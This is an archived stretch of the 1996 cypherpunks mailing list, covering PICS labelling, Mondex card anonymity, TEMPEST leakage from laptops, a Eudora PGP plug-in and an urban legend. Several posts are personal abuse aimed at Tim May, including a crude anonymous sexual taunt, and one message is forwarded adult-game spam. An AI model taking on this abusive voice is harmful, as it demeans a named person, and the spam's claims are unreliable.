iQEVAwUBMqj8tizIPc7jvyFpAQE1xAgAjzGpLhMx3F3PO2zpV5qq0yOL/paq3hRn
DyCkcp8vx7kk06uASHod3IIGaEJ3F1WA5unHzS4wV0q7cCURXyX8iz0p4hhrc14W
r3feO4T8uNcobAKP5GcP4q6uin8z1FHCtPJrKePb++I7joo/qaQ3xXXp4mCDb77H
AJyZJsaFCR6Cd6wsViVTSuOTu9ZvPIyLFUEZZ5kzGlEk4wcsKKYZ8Wqg8jRCZIot
oWiVuqgquvZjP9ad5HGVBwPDYw1Ujl5WqyPS/xPP3UHCJ2THGpR4PFw7F+gWhh/x
l4qeFuEqV08uo0IYwAEky727IvvUM7aVTKY7F6OquxcDo83J12EAFw==
=/o7Z
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ChrisMSW1@aol.com
Date: Sat, 7 Dec 1996 04:36:58 -0800 (PST)
Subject: Paradise
Message-ID: <961207072021_808040999@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



---------------------
Forwarded message:
Subj:    Paradise
Date:    96-12-07 05:48:26 EST
From:    ChrisMSW1
To:      ChrisMSW1

       This is to inform you about the new adult game that VCS Magazine rated
"The best game of '96" and gave an "Outstanding ****" (4 stars).  "The Search
for Paradise is no doubt one of the greatest XXX Adult games available."  The
first game where it is as much fun as it is a turn on.  Travel the world to
every continent, every country you can think of, and meet some of the most
beautiful women in existence. These women will treat you like a king and obey
your every command.  Any sexual wish you can think of, these women know it
all.  There is a different paradise for every guy out there, and this game
will have them all.  This game uses real models, digital video, and digital
sound
to make it as realistic as possible. You will feel like you're in the same
room as the girl you're talking to.  ---  Required: 386 or better, 4 meg ram
or better, Windows 3.1 or higher (Win95 is fine), sound card is optional,
CD-Rom is optional.  Game is given either CD-rom, or compressed 3.5"
diskettes.) - $19.95.

    The last adult game we are going to inform you about is the newly
released "Club Celebrity X".  Imagine being in a club with some very
beautiful, well known, ACTUAL celebrities that with skill, will be making you
breakfast in bed the next day.  These girls you have seen on television, 
magazines, and billboard ads, and now they are on your computer, begging 
for action. Each girl you will recognize and you won't believe your eyes when
you got them in your own bedroom. This game is hot, and once you start 
playing, you won't be able to stop.   ---  Required: 386 or better, 4 meg ram

or better, Windows 3.1 or higher (Win95 is fine), sound card is optional, 
CD-Rom is optional. Game is given either CD-rom, or compressed 3.5" 
diskettes.) - $19.95.

Software arrives is a plain, unmarked, brown package.  Delivery takes no
longer than 7 to 8 working days.  Both your email address, and mailing
address are NOT added to any mailing lists whatsoever.  Once you are mailed
this email, your name is deleated from all lists to ensure you are not mailed
again.  

Each game is $19.95, but for a limited time, you can get both "The Search for
Paradise" and "Club Celebrity X" for just $29.95.   Shipping and handling is
$2.00 for each game ordered.  There are no additional charges or fees.

Please make checks or money orders out to: Chris Mark

Send to:

Chris Mark Software
SMD, Inc.
9800-D Topanga Cyn Blvd. #348
Chatsworth, CA  91311

You must be at least 18 years of age to order this software.

PHONE#  818-948-5837




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Sat, 7 Dec 1996 10:13:20 -0800 (PST)
To: tcmay@got.net
Subject: Re: The Science Generations
In-Reply-To: <v03007800aece135625e1@[207.167.93.63]>
Message-ID: <199612071749.JAA08668@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Indeed, in the 1970s I was using H-P 9825s and DEC PDP 11/34s, but the
> teenagers of that decade were, if they were fortunate and energetic, using
> PETs, Apple IIs, and the like.

Right On!  PDP 11's rule!!!

My favorite one was an 11/34 with "Hardware Floating Point" that had a
GT-43 vector display processor as a coprocessor.  You'd build a double
buffered display list of vector instructions for the coprocessor,
using your handy dandy fortran program, and then let it rip.  As long
as you weren't trying to do hidden line removal, or draw more than
about 200 vectors, you could get smooth, real-time wire frame
animation.  We had it hooked up to a couple of knob boxes and some
nice three axis joy sticks connected to 10 bit A/D's.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@extol.com.my>
Date: Fri, 6 Dec 1996 05:24:09 -0800 (PST)
To: "'Andrew Loewenstern'" <cypherpunks@toad.com>
Subject: RE: PGP 5.0??
Message-ID: <96Dec7.022914gmt+0800.21897@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


Ah! You got it!

----------


> ...and isn't all.net the site of the Good Doctor Fred Cohen??


andrew







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <strix@rust.net>
Date: Sat, 7 Dec 1996 07:17:26 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
In-Reply-To: <v02140b00aece7a3a9c9e@[10.0.2.15]>
Message-ID: <Pine.LNX.3.91.961207110732.79G-100000@neophron.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Dec 1996, Steve Schear wrote:
> 
> I heard an almost identical story from a security guard at DEFCON IV last
> july in Las Vegas.  He said it happened in the hotel where he was working

One might (I'm not a surgeon) be able to get viable kidneys under the
circumstances mentioned, but the victim wouldn't wake up.  This has all the
hallmarks of a good urban legend.
`=-`=-`=-`=-                                          -='-='-='-='
 Jennifer Mansfield-Jones   http://www.rust.net/~strix/strix.html
 strix@rust.net                            PGP key ------^
          Never try to outstubborn a cat.  (R.A.H.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMqmX70xVmNNM34OxAQET4gQAnNvhfuaCdrHrblE/9C2nWiKXJjbMIqOw
SgGsbfBqySdi0/SvDH9+obv2ijf6dOfuFuGDA3CZN+UGA6/9Opew+HLaGuWeHyLf
aFiw13Aemu3R0V0E6U/jD2IKs2GU7b5lxzXNVZ/velZCBeRqpBXIdkfYIFBUo57J
B/kU7/xf030=
=WK8m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Dec 1996 08:50:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto continues to go mainstream
Message-ID: <46RkyD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: hoffman@seas.gwu.edu (Lance J. Hoffman)
>Newsgroups: sci.crypt,alt.security,comp.security.misc,alt.security.pgp
>Subject: Re: University courses on cryptography and security
>Date: 4 Dec 1996 22:17:20 -0500
>Organization: George Washington University
>Message-ID: <585es0$gac@felix.seas.gwu.edu>
>References: <57v5k0$8ql@news.eecs.umich.edu>
>
>The George Washington University
>GRADUATE DEGREE IN COMPUTER SCIENCE
>Specialization in Computer Security
>
>     The George Washington University Department of Electrical
>Engineering and Computer Science
>offers a traditional graduate program with a few twists.  One of the
>twists is that we now have four
>graduate courses related to computer security, and an area of
>specialization (within computer science) in
>it.  In addition, the opportunities to pursue dissertation work and
>special projects are "real world" since
>many government administrative agencies, laboratories, and Congress
>are usually just a metro ride away.
>=46or those who wish to combine technology and public policy, excellent
>contacts are maintained with the
>law and medical schools and with key congressional and administration
>offices.
>
>DESCRIPTIONS OF COMPUTER SECURITY RELATED COURSES
>
>CS 229. Computer Security Systems I.  Techniques for security in
>computer systems.  Authentication,
>logging, authorization, encryption.  International criteria.ia s.
>Effects of operating systems and
>machine architecture, countermeasures, risk-analysis systems.
>Companion course to EE 250.
>Prerequisite: CSci 144 (Concepts of Programming Languages) or
>equivalent.
>
>CS 329. Computer Security Systems II.  Advanced topics in information
>system security.  Intrusion detection.  Viruses, worms, and trojan
>horses, and other rogue programs.  Advanced risk analysis methodologies,
>developing international standards, computer security models.  Network
>security.  Protection against statistical inference.  Prerequisite CS229.
>B
>s
>EE250. Telecommunications Security Systems.  Cryptography.  Speech
>and data scrambling.  Nonlinear
>transformations.  Block and stream ciphers.  DES algorithm and public
>key cryptography.  Key
>management, digital signatures, and authentication.  Data
>communication security protocols.  Secure voice
>communications.  The CLIPPER initiative and escrowed-key schemes.
>Companion course to CS 229.
>Prerequisite EE 204 (Stochastic signals and noise) or equivalent.
>
>CS 230. Information Policy.  Issues related to computers and privacy,
>equity, freedom of speech, search
>and seizure, access to personal and governmental information,
>professional responsibilities, ethics,
>criminality, and law enforcement.  This course examines these policy
>issues using the current literature
>and written, electronic, and videotape proceedings of recent major
>conferences and government hearings.
>Prerequiste CS 131 (Programming and Data Structures) or equivalent.
>
>                     FOR FURTHER INFORMATION
>
>Administrative: Contact the Department of Electrical Engineering and
>Computer Science, (202) 994-6083.
>About courses: Contact Prof. Lance J. Hoffman, (202) 994-4955 or
>hoffman@seas.gwu.edu.
>
>
>
>December 4, 1996
>--
>Professor Lance J. Hoffman
>Department of Electrical Engineering and Computer Science
>The George Washington University    (202) 994-4955    Fax: (202) 994-0227
>Washington, D. C. 20052             hoffman@seas.gwu.edu
>
>--
>Professor Lance J. Hoffman
>Dept of Elec Eng and Comp Sci, The Geo Washington U, 801 22nd St NW
>Wash DC 20052   (202) 994-5513   Fax: (202) 994-0227  =
>hoffman@seas.gwu.edu
>See also info on the Cyberspace Policy Institute:
>http://www.cpi.seas.gwu.edu/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 7 Dec 1996 09:34:44 -0800 (PST)
To: crypto@uhf.wireless.net (Crypto Policy)
Subject: Re: ANSI X9 pointers
In-Reply-To: <Pine.BSI.3.91.961206220409.1231G-100000@uhf.wdc.net>
Message-ID: <199612071753.LAA00820@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi:
> I am writing a paper on the ridiculous/backwards US crypto policy.
> I am trying to write a few words about the ANSI X9 vs. clipper 
> fight, but I haven't been able to find anything on ANSI X9. 
> Can anyone point me to info on ANSI x9 on the web?

     An altavista seach on:
     ansi and x9
     
     returned:
     Documents 1-10 of about 400 matching the query, in no particular order.

     Hope that helps.



Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 7 Dec 1996 14:50:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <199612071722.EAA26996@oznet02.ozemail.com.au>
Message-ID: <v03007800aecf7a54503b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:18 AM +0000 12/8/96, Robin Whittle wrote:
>I do not believe that PICS is a form of censorship, except for those
>people - children and employees - whose computing environment is
>beyone their direct control and who have to live with a browser that
>filters based on PICS labels.
>
>For much, much more on the Internet content regulation debate, see my
>WWW site.
>
>PICS is basically an excellent idea in my view.  It provides a means
>of child protection which is not censorship of the net or censorship
>of sources of information.  It is also useful for other things.
>
>However I don't beleive it is practical or desirable to insist that
>all people use PICS and a particular value system to label their WWW
>material - there is likely to be no suitable value system which is
>adequate in all situations.

PICS is yet another "sword of Damocles."

While I agree that a completely voluntary PICS system is unexceptionable,
how long can we expect that PICS will remain voluntary? Given the way our
democracies work, when little Johnnie and little Suzie start accessing
"naughty" or "controversial" material, sans PICS, or with "fraudulent PICS"
(e.g., "PICS = G, for all ages, ethnic groups, genders, and emotional
maturities"), how long will it be before governments respond to pressure
and make PICS mandatory?

Now it happens that this probably runs smack into the First Amendment, for
U.S. folks. While there may or may not be valid controls on access to
pornography--a hotly debated issue for many decades and not one I'll get
into here--it is almost a certainty that one is under no compulsion to
categorize and label one's speech or one's writings--modulo the porn issue,
as noted.

A requirement that one categorize and label one's words, based on some
criteria established, is tantamount to making a law about what speech is
acceptable. (Legal bozos may jump in here with proposals that PICS
standards not be enforced as a prior restraint, but that anyone who fails
to PICS label his or her material is potentially liable under civil law...a
distinction without a difference, as I see it.)

So, as long as PICS is fully voluntary, and I mean _fully_ voluntary, civil
libertarians will likely not object. After all, it's just a system _some_
other people (maybe even most) are voluntarily adhering to. However, the
pressure to stop "rogues" from "subverting" the PICS system by either not
using it, or by deliberately monkeywrenching it, will be enormous.

(As an example, there are many folks who, for their various reasons,
believe children _should_ be exposed to sexual material at an early age. If
they label their explicit material as "suitable for all children," who is
to decide they have committed "fraud"? Will their be "PICS courts"
arbitrating? And if so, the system is no longer fully voluntary, at least
in terms of interpreting the standards.)

This is why I fear PICS. Democracy has run amok in the Western world, and
the various "herds" will vote to constrain the freedoms of other members of
the herd.

My Prediction: If PICS is used voluntarily by more than 80% of Net users to
label their Web pages and their writings, etc., then less than 3 years
later PICS will be mandated in the United States and other such countries.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Phillips" <djphill@umich.edu>
Date: Sat, 7 Dec 1996 10:22:15 -0800 (PST)
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Mondex
Message-ID: <199612071821.NAA16697@rodan.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 12/6/96 -0500, you wrote:
>Can anyone briefly discuss the anonymity features (or lack thereof) for
>Mondex?

The following information is gleaned from Seth Grodin's "Presenting Digital
Cash" (Sams.net Publishing 1995), the British Environmental Health and
Trading Standards' response to Simon Davies' false advertising claim against
Mondex,  The FAQ page of Mondex's web site, and Tim Jones' testimony before
the U.S. House of Representatives.

Each card is uniquely identified, and the id of the card is linked at the
issuing bank with the identity of the card holder.

According to Grodin,  each card has 3 logs, the transaction log (recording
the recipient, date, and amount of the last ten transactions), a pending log
of current transaction process, and an exception log recording "unsuccessful
transactions".  When the exception log is filled, card is disabled.  

Traders' tills retain the last 300 transactions as card number, value and
date. (Presumably this log info can be offloaded to another devise after
every 300 transactions, so the merchant's log can be limitless in size.)
Tills record the card's identity, not the user's identity.  However, banks
have access (I'm not sure by what mechanism) to the till logs, and can then
link transactions to card holders (or at least to the individual to whom
they have issued the card - whether or not this is the person actually using
the card.)  

Mondex touts their system's ability to monitor aggregate monetary flow,
presumably through monitoring merchants' tills.  (Jones to House of Reps:
"Retailer's terminals and bank cashpoints provide many opportunities for
Mondex to capture transaction data and patterns of behaviour which can be
analysed to give warning of suspicious circumstances.") 

In addition to aggregate data, there is also some mechanism for isolating
unusual activity on a particular card.  (Jones to House of Reps: "In
addition, Mondex transactions can be assessed automatically against
threshold parameters, derived from past experience. Discovery that a
transaction exceeded such thresholds can raise a warning, which can enable a
member bank to disable or lock the card if desired.")  I don't know how this
is supposed to work, but I suppose it could be linked to the exception log
on each card, which may record anomalous transactions as well as
unsuccessful ones.

Banks have the option of issuing cards which require on-line authorization
for transactions (or, I imagine, for transactions above a certain threshold
or meeting some other sort of criteria.)

Much of the monitoring capacity seems to depend on communication between
merchant tills and banks, or through auditing of individual deposits and
withdrawals at the bank. (Jones to House of Reps:  "Suspicions can be
aroused, for instance, by regular or frequent value redemption from
particular 'unexplained' sources, by a high average of redemptions relative
to the card limit (for example, an individual's card behaving as if it was
handling the amounts appropriate to a shopkeeper's card) or single large
redemptions from an unusual location.")  But apparently value can also be
transferred between consumer wallets, and I don't know how that is monitored. 

I'm eager to learn anything more about this.

djp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Dec 1996 14:51:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
In-Reply-To: <Pine.LNX.3.91.961207110732.79G-100000@neophron.rust.net>
Message-ID: <6mykyD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jennifer Mansfield-Jones <strix@rust.net> writes:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> On Fri, 6 Dec 1996, Steve Schear wrote:
> >
> > I heard an almost identical story from a security guard at DEFCON IV last
> > july in Las Vegas.  He said it happened in the hotel where he was working
>
> One might (I'm not a surgeon) be able to get viable kidneys under the
> circumstances mentioned, but the victim wouldn't wake up.  This has all the
> hallmarks of a good urban legend.

When it doubt, blame Timmy May (fart).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Dec 1996 14:51:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: cypher-PUNKS...
In-Reply-To: <v03007801aece1de9a1d9@[207.167.93.63]>
Message-ID: <gTykyD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> I've initiated more threads on crypto-related and politico-crypto topics
> than nearly anyone else.

Ritalin, attacks on Mormons, assault rifles, attacks on "crazy Russians"...

Crackpot spammer Timmy May (fart) lies again.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Dec 1996 14:52:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Family Channel" of the Internet?
In-Reply-To: <3.0.32.19961206210712.0091fda0@gateway.grumman.com>
Message-ID: <yZykyD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rick Osborne <osborne@gateway.grumman.com> writes:
> >3) In general, how would you use crypto to ensure that your users only
> >connected to approved sites, regardless of the platform or browser
> >software they were using?
> I wouldn't.  It's not even a crypto issue.  That's like asking how you
> would use your tea kettle to peel this orange: sure, you *could* do it, but
> why?
>
> I think your pegged 'bogometer' had it pegged.

I think one come up with a scheme where the web access is through a proxy
server which doesn't let through HTML pages unless the contain a sort of
digitally signed 'G rating'.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 7 Dec 1996 06:06:20 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Mondex
In-Reply-To: <Pine.SUN.3.94.961206110148.1568B-100000@polaris>
Message-ID: <199612071408.PAA22126@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



> Can anyone briefly discuss the anonymity features (or lack thereof) for
> Mondex?

Any anonymity derives from the fact that Mondex cards are bearer devices.  
Sure, a real name may have to be used to obtain a card, but I don't see how 
Mondex can prevent the cards being passed on.  One would guess that they could 
only realistically achieve this if the card were embedded in a credit card or 
something similar.

As far as I can see, the transactions have to be untraceable, as long as user 
to user transactions can occur, and there is no limit to the number of 
transactions per card.  Even if the cards record the last 300 (as rumours 
suggest) transactions, that just means I have to perform 300 transactions 
between a pair of my cards in order to erase the "interesting" history.  The 
ability to erase the history could only be prevented by restricting the number 
of transactions per card, or by preventing card to card transactions.

There does seem to be some scope for other tracing tricks however.  For 
instance, it may be possible for a card to remember IDs of the last few 
hundred cards it has communicated with.  However, if we know this, then we 
just have to have a few hundred cards of our own to "erase" the interesting 
IDs.

Bear in mind that it may be possible for all "electronic coins" that are 
issued to be given a serial number.  There would be no tricks to circumvent 
this, but of course tracing can only occur when the money leaves and enters 
the bank (and perhaps at every shop counter), so the usefulness of this is 
limited if many user to user transactions are occurring.  I don't think Mondex 
does this, though, since the memory requirements seem to be too large for 
todays smartcards.  What I *guess* Mondex does do though, is "mark" coins in 
certain situations - eg. a kidnapper is paid a ransom via cellphone in another 
country using Mondex, but the coins are marked. They will stay marked no 
matter how many times they are transferred, and eventually will be caught by 
the system (either as they are deposited into an account, or perhaps via shop 
terminals looking for the mark).  This would not ensure the catching of the 
kidnapper, but at least gives the authorities a start.  It may also be 
possible to put a time limit on these expired coins, so that the money 
"vanishes" some time after the baby is returned alive (or whatever).

Gary







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 7 Dec 1996 15:12:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Laptops and TEMPEST
Message-ID: <3.0.32.19961207151252.0068e328@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[Sorry, I don't have the attribution for the fist quote. The remainder of
the post was authored by a friend of mine who retired from decades in
military SIGINT. He allowed me to forward it to the list.]

>>> don't emit enough radiation for Bad Guys to read it.  CRTs are well known
>>> as emitters of easily decoded signal, but people have occasionally
>suggested
>>> on this list that laptop LCD screens are much quieter.  I now have a data
>>> point on this one, and basically, it ain't so.


    Look - if it uses electricity; if there is an oscillator
    anywhere innit; if there is a ground loop in the circuit design,
    if there are make/break contacts anywhere - It will 
    radiate, and the amount it radiates is directly proportional
    to the basic power source ...  And circuit board traces are
    getting so damned close that engineers I know/knew were
    worried about friggin' arc-over at 3 volts.  By now, may be
    even closer and voltage worries lower...

    So we have a problem. The only computer I know of that
    is (at this date) leak-proof is the biological one
    'twixt one's ears.  And soon, maybe not even that.  Those
    who laugh at the paranoiacs who wear aluminum helmets and
    wear shoes with a static strap to the sidewalk may
    be laughing out the other side of their moufs too soon...

    As for any government directives requiring companies to make 
    computers leak, I know of none, but CAVEAT: I've been retired
    from source info since '91, and most of my friends/fellow engrs
    who occasionally got together for a few brewskis and BS sessions
    over in Mt. View have either gone to better jobs (more $$$),
    transferred back east, or inconsiderately died.  So, who
    knows? 

    And of course, the ability to detect this RF/RFI/EMI leakage    
    from your information processor is similarly dependent
    on the sensitivity of the equipment you're using for 
    detection.  I've seen absolute magic performed using 
    a Wullenweber antenna, and that is NOT state-of-the-art
    equipment any more (ca. 1965-70), even tho the DoD keeps throwing 
    money at it in upgrades (affectionately called 'the 
    elephant's cage' by those who worked with it).

    If you really need to keep your information processing
    "private", then you can either isolate yourself inside
    a double-shielded room of solid copper; power everything
    with batteries; have no wires leading out of that room;
    make damned sure the door has the nice secure wiping strips
    to complete the shield when you close it -- or move your
    information processor into the middle of a whole bunch of
    the same or worse RF/RFI/EMI emitters, and just _maybe_
    your data will get lost or become inaccessible because
    of the overload of the detection equipment by much larger
    interference fields.

    Or use paper, pencil, and one-time pads and burn everything
    that's done "in the clear" and really scrunch the ashes into
    dust.

[Again, I am not the author of the above post.]


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Sat, 7 Dec 1996 14:48:49 -0800 (PST)
To: ! Drive <drink@aa.net>
Subject: Re: Please post Eudora PGP plugin URL
Message-ID: <3.0.32.19961207173112.006a0994@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:57 PM 12/6/96 -0800, you wrote:
:Or Email it to me 
:
:
:Thanks in advance
:
You're welcome

-----------------------------------------------------
Eudora/PGP Plug-In

    Download version 0.20 from the Web: 
    http://www.prism.gatech.edu/~gt6525c/eppi/epp16_02.zip
    (for 16-bit version of Eudora 3.0 for Windows 3.1) 
    http://www.prism.gatech.edu/~gt6525c/eppi/epp32_02.zip
    (for 32-bit version of Eudora 3.0 for Windows NT/95) 

If you don't have Web access, but have FTP access, try the following sites.
Note that if the version you are trying to get was released today or just a
few
days ago, it may not have shown up at the sites below yet, so give it a few
days:

papa.indstate.edu: /pub/winsock-l/mail/epp16_02.zip
                   /pub/winsock-l/Windows95/mail/epp32_02.zip
                   /pub/winsock-l/WindowsNT/mail/epp32_02.zip

ftp.winsite.com:   /pub/pc/win3/winsock/epp16_02.zip
                   /pub/pc/win95/winsock/epp32_02.zip

If you want to be automatically notified of new versions, send e-mail to
gt6525c@prism.gatech.edu with the subject of "eppi news", and the following
message body:

join
stop

You will not be able to post to this list. It is merely a convenient way to
receive notification of new updates to EPPI. 

Send comments to: gt6525c@prism.gatech.edu 


What is EPPI?

EPPI is the acronym for Eudora/PGP Plug-In. It is a "Plug-In" module for
Eudora for Windows. Eudora Plug-Ins are simply programs that utilize the new
Extended Messaging Services API (EMSAPI) that were introduced with Eudora 3.0.

EPPI makes it easier to use PGP (Pretty Good Privacy) with e-mail via
Eudora. Note that EPPI does not contain any encryption/decryption routines,
so it
should not violate anybody's export/import restrictions. It simply calls
the PGP executable with the appropriate command-line options in order to
perform
the requested functions. It's also 100% free! Get a copy, give it to your
friends, spread it around...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 7 Dec 1996 10:33:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: [STEGO] Firewalls
Message-ID: <199612071818.TAA14496@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[retin] Mayflower's wee-wee is so tiny that only his mommy is allowed to 
touch it.

   |\    \ \ \ \ \ \ \      __
   |  \    \ \ \ \ \ \ \   | O~-_ Tim C[retin] Mayflower
   |   >----|-|-|-|-|-|-|--|  __/
   |  /    / / / / / / /   |__\
   |/     / / / / / / /




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 7 Dec 1996 17:30:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Laptops and TEMPEST
In-Reply-To: <3.0.32.19961207151252.0068e328@netcom14.netcom.com>
Message-ID: <199612080126.TAA27410@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:
>     If you really need to keep your information processing
>     "private", then you can either isolate yourself inside
>     a double-shielded room of solid copper; power everything
>     with batteries; have no wires leading out of that room;
>     make damned sure the door has the nice secure wiping strips
>     to complete the shield when you close it -- or move your
>     information processor into the middle of a whole bunch of
>     the same or worse RF/RFI/EMI emitters, and just _maybe_
>     your data will get lost or become inaccessible because
>     of the overload of the detection equipment by much larger
>     interference fields.
> 
>     Or use paper, pencil, and one-time pads and burn everything
>     that's done "in the clear" and really scrunch the ashes into
>     dust.

> [Again, I am not the author of the above post.]

An interesting use of one time pads -- to keep one's own secrets.

And where to keep the pads themselves?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rosario Family <samiam@coqui.net>
Date: Sat, 7 Dec 1996 15:58:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Returned mail: User unknown]
Message-ID: <32A9CBCC.731A@coqui.net>
MIME-Version: 1.0
Content-Type: message/rfc822


To: <samiam@coqui.net>
Subject: Returned mail: User unknown
From: Mail Delivery Subsystem <MAILER-DAEMON>
Date: Sat, 7 Dec 1996 18:52:01 -0500 (EST)
Auto-Submitted: auto-generated (failure)

The original message was received at Sat, 7 Dec 1996 18:51:56 -0500 (EST)
from sanjuan-ppp230.coqui.net [206.99.218.226]

   ----- The following addresses had permanent fatal errors -----
<cypeherpunks@toad.com>

   ----- Transcript of session follows -----
... while talking to toad.com.:
>>> RCPT To:<cypeherpunks@toad.com>
<<< 550 <cypeherpunks@toad.com>... User unknown
550 <cypeherpunks@toad.com>... User unknown


Reporting-MTA: dns; server1.coqui.net
Received-From-MTA: dns; sanjuan-ppp230.coqui.net
Arrival-Date: Sat, 7 Dec 1996 18:51:56 -0500 (EST)

Final-Recipient: rfc822; cypeherpunks@toad.com
Action: failed
Status: 5.1.1
Remote-MTA: dns; toad.com
Diagnostic-Code: smtp; 550 <cypeherpunks@toad.com>... User unknown
Last-Attempt-Date: Sat, 7 Dec 1996 18:52:01 -0500 (EST)


To: cypeherpunks@toad.com
Subject: we are getting your mail-[Fwd: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN]
From: Rosario Family <samiam@coqui.net>
Date: Sat, 07 Dec 1996 19:50:43 +0000
Organization: Mikelo & Samantha
Reply-To: samiam@coqui.net

please see what you can do - we are getting your mail- we have gotten
over 60 e-mails today that should go to you- do you want them?? also-
please fix this situation- we just don't have space for that much mail
;-)


To: cypherpunks@toad.com
Subject: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
From: azur@netcom.com (Steve Schear)
Date: Fri, 6 Dec 1996 17:40:35 -0800
Sender: owner-cypherpunks@toad.com

I heard an almost identical story from a security guard at DEFCON IV last
july in Las Vegas.  He said it happened in the hotel where he was working
(not the Monte Carlo, which had just opened) in 1995.  The management
managed to cover the event up and it never, according to him, appeared in
the local papers.


>| >>>  A friend of mine from UT passed this story onto me from the "Daily
>| >>>  Texan" - the University of Texas newspaper. Apparently it occured
>| >>>  during Fall Premier -- a UT tradition that is a celebration of the
>| >>>  end of midterms.
>| >>>
>| >>> >"Reason to not party anymore"-
>| >>> >
>| >>> >
>| >>> >This guy went out last Saturday night to a party.  He was having a
>| >>> >good time, had a couple  of beers and some girl seemed to like him
>| >>> >and invited him to go to another party.  He quickly agreed and
>| >decided
>| >>> >to go along with her.  She took him to a party in some apartment
>| >and
>| >>> >they continued to drink, and even got involved with some other
>| >drugs
>| >>> >(unknown which).
>| >>> >
>| >>> >The next thing he knew, he woke up completely naked in a bathtub
